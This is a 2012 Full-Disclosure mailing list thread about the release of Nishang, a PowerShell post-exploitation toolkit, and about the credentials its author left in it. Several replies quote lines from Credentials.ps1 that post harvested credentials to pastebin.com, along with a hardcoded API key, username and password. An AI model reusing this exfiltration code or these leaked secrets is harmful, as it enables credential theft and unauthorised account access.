Re: [Full-disclosure] Nishang: PowerShell for Penetration Testing

2012-08-16 Thread Harry Hoffman 
Some time ago a colleague and I collaborated on a bit of software that
analyzed and reported on interesting/unknown/anomalous logs.

It reported via email. We published the code to the web in the hope
others would find it useful. I forgot and left my email addr as the
default mail to.

You'd be amazed that: a) people don't bother to look through the
code/configs and b) how much information you can gather when people
inadvertently send you all of their logs.

Just sayin'

Cheers,
Harry

On 08/15/2012 03:25 PM, Peter Dawson wrote:
> and this is coming from person who is "has many  years experience in
> Penetration Testing of many Government Organizations of India and other
> global corporate giants.
>  
> Who the friggin hell hires such peeps who give away key /userid/pwd eh ?
>  
> /pd
>  
> On Wed, Aug 15, 2012 at 2:52 PM, Harry Hoffman
> mailto:hhoff...@ip-solutions.net>> wrote:
> 
> Probably at the least want to change your pastebin password and api key:
> 
> >From Credentials.ps1:
> 
> Post_http "http://pastebin.com/api/api_login.php";
> 
> "api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_user_name=koshish&api_user_password=nikhilpastebin"
> 
> Post_http "http://pastebin.com/api/api_post.php";
> 
> "api_user_key=$session_key&api_option=paste&api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_paste_name=creds&api_paste_code=$pastevalue&api_paste_private=2"
> 
> "
> 
> Cheers,
> Harry
> 
> On 08/15/2012 05:49 AM, Nikhil Mittal wrote:
> > Hi List,
> >
> > I have written a tool in PowerShell which helps in usage of PowerShell
> > for post exploitation activity. The tool, called, Nishang. is a
> > framework and collection of PowerShell scripts.
> >
> > Details about it could be found on my blog at
> >
> 
> http://labofapenetrationtester.blogspot.com/2012/08/introducing-nishang-powereshell-for.html
> >
> > The toolkit is available at:
> > http://code.google.com/p/nishang/
> >
> > Please feel free to report bugs, feedbacks and feature requests.
> >
> > Regards,
> > Nikhil _SamratAshok_ Mittal
> > http://labofapenetrationtester.blogspot.com/
> > @nikhil_mitt 
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Nishang: PowerShell for Penetration Testing

2012-08-15 Thread Nikhil Mittal 
Thanks Harry and sorry for this, I have removed the creds and edited the code 
to accept user input. 


pd,
Relax, that is a demo pastebin account and I use this for demonstration/test. 
Though I never left it intentionally there and it is my fault.

For your surprise many ppl still hire me :P



>>|and this is coming from person who is "has many  years experience 
>>Penetration Testing of many Government Organizations of India and other
>>global corporate giants.

>>Who the friggin hell hires such peeps who give away key /userid/pwd eh ?

>>/pd

On Wed, Aug 15, 2012 at 2:52 PM, Harry Hoffman
 wrote:

> Probably at the least want to change your pastebin password and api key:
>
> >From Credentials.ps1:
>
> Post_http "http://pastebin.com/api/api_login.php";
>
> "api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_user_name=koshish&api_user_password=nikhilpastebin"
>
> Post_http "http://pastebin.com/api/api_post.php";
>
> "api_user_key=$session_key&api_option=paste&api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_paste_name=creds&api_paste_code=$pastevalue&api_paste_private=2"
>
> "
>
> Cheers,
> Harry
>
> On 08/15/2012 05:49 AM, Nikhil Mittal wrote:
>
 > Hi List,
> >
> > I have written a tool in PowerShell which helps in usage of PowerShell
> > for post exploitation activity. The tool, called, Nishang. is a
> > framework and collection of PowerShell scripts.
> >
> > Details about it could be found on my blog at
> >
> http://labofapenetrationtester.blogspot.com/2012/08/introducing-nishang-powereshell-for.html
> >
> > The toolkit is available at:
> > http://code.google.com/p/nishang/
> >
> > Please feel free to report bugs, feedbacks and feature requests.
> >
> > Regards,
> > Nikhil _SamratAshok_ Mittal
> > http://labofapenetrationtester.blogspot.com/
> > @nikhil_mitt 
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/

>___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Nishang: PowerShell for Penetration Testing

2012-08-15 Thread Peter Dawson 
and this is coming from person who is "has many  years experience in
Penetration Testing of many Government Organizations of India and other
global corporate giants.

Who the friggin hell hires such peeps who give away key /userid/pwd eh ?

/pd

On Wed, Aug 15, 2012 at 2:52 PM, Harry Hoffman wrote:

> Probably at the least want to change your pastebin password and api key:
>
> >From Credentials.ps1:
>
> Post_http "http://pastebin.com/api/api_login.php";
>
> "api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_user_name=koshish&api_user_password=nikhilpastebin"
>
> Post_http "http://pastebin.com/api/api_post.php";
>
> "api_user_key=$session_key&api_option=paste&api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_paste_name=creds&api_paste_code=$pastevalue&api_paste_private=2"
>
> "
>
> Cheers,
> Harry
>
> On 08/15/2012 05:49 AM, Nikhil Mittal wrote:
> > Hi List,
> >
> > I have written a tool in PowerShell which helps in usage of PowerShell
> > for post exploitation activity. The tool, called, Nishang. is a
> > framework and collection of PowerShell scripts.
> >
> > Details about it could be found on my blog at
> >
> http://labofapenetrationtester.blogspot.com/2012/08/introducing-nishang-powereshell-for.html
> >
> > The toolkit is available at:
> > http://code.google.com/p/nishang/
> >
> > Please feel free to report bugs, feedbacks and feature requests.
> >
> > Regards,
> > Nikhil _SamratAshok_ Mittal
> > http://labofapenetrationtester.blogspot.com/
> > @nikhil_mitt 
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Nishang: PowerShell for Penetration Testing

2012-08-15 Thread Harry Hoffman 
Probably at the least want to change your pastebin password and api key:

>From Credentials.ps1:

Post_http "http://pastebin.com/api/api_login.php";
"api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_user_name=koshish&api_user_password=nikhilpastebin"

Post_http "http://pastebin.com/api/api_post.php";
"api_user_key=$session_key&api_option=paste&api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_paste_name=creds&api_paste_code=$pastevalue&api_paste_private=2"

"

Cheers,
Harry

On 08/15/2012 05:49 AM, Nikhil Mittal wrote:
> Hi List,
> 
> I have written a tool in PowerShell which helps in usage of PowerShell
> for post exploitation activity. The tool, called, Nishang. is a
> framework and collection of PowerShell scripts.
> 
> Details about it could be found on my blog at
> http://labofapenetrationtester.blogspot.com/2012/08/introducing-nishang-powereshell-for.html
> 
> The toolkit is available at:
> http://code.google.com/p/nishang/
> 
> Please feel free to report bugs, feedbacks and feature requests.
>  
> Regards,
> Nikhil _SamratAshok_ Mittal
> http://labofapenetrationtester.blogspot.com/
> @nikhil_mitt 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Nishang: PowerShell for Penetration Testing

2012-08-15 Thread Nikhil Mittal 
Hi List,

I have written a tool in PowerShell which helps in usage of PowerShell for post 
exploitation activity. The tool, called, Nishang. is a framework and collection 
of PowerShell scripts.

Details about it could be found on my blog at 
http://labofapenetrationtester.blogspot.com/2012/08/introducing-nishang-powereshell-for.html

The toolkit is available at: 

http://code.google.com/p/nishang/

Please feel free to report bugs, feedbacks and feature requests.

 
Regards,
Nikhil _SamratAshok_ Mittal
http://labofapenetrationtester.blogspot.com/
@nikhil_mitt___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/